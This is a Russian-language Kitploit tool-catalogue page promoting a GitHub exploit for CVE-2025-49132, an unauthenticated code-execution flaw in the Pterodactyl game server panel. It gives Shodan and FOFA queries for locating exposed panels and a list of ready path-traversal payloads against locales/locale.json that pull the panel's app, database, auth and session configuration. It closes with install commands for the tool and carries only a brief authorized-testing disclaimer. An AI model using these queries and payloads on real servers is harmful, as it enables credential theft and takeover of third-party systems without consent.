Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-49132 — Инструмент эксплуатации для CVE-2025-49132, критической неаутентифицированной RCE в панелях игровых серверов Pterodactyl. Включает запросы разведки и полезные нагрузки для авторизованного тестирования на проникновение. | Kitploit
Инструменты/GitHubGitHub/yurahshell/cve-2025-49132
РазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubyurahshell/cve-2025-49132

CVE-2025-49132

Инструмент эксплуатации для CVE-2025-49132, критической неаутентифицированной RCE в панелях игровых серверов Pterodactyl. Включает запросы разведки и полезные нагрузки для авторизованного тестирования на проникновение.

Репозиторий
2 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-49132 — Pterodactyl RCE

Эксплойт для CVE-2025-49132 — критическая уязвимость удалённого выполнения кода без аутентификации, затрагивающая панель управления игровыми серверами Pterodactyl.


🧠 Что такое CVE-2025-49132?

Критическая ACE-уязвимость в панели Pterodactyl, позволяющая неаутентифицированным удалённым злоумышленникам выполнять произвольный код — что потенциально приводит к полной компрометации системы.

Никакой аутентификации не требуется. Достаточно уязвимого экземпляра.


⚠️ Отказ от ответственности

Только для образовательных целей и авторизованного тестирования на проникновение.

🔍 Разведка

Shodan

root@kitploit:~
http.title:"Pterodactyl"

FOFA

root@kitploit:~
"Pterodactyl"

💉 Полезные нагрузки (Payloads)

root@kitploit:~
locales/locale.json?locale=../../../pterodactyl&namespace=config/app
locales/locale.json?locale=../../../pterodactyl&namespace=config/database
locales/locale.json?locale=../../../pterodactyl&namespace=config/auth
locales/locale.json?locale=../../../pterodactyl&namespace=config/session

📦 Установка

root@kitploit:~
git clone https://github.com/yurahshell/CVE-2025-49132
cd CVE-2025-49132
pip install -r requirements.txt

🎯 Уязвимое программное обеспечение

Программное обеспечениеСтатус
Pterodactyl Panel

📄 Ссылки

  • NVD - CVE-2025-49132
  • Pterodactyl
Скачать инструмент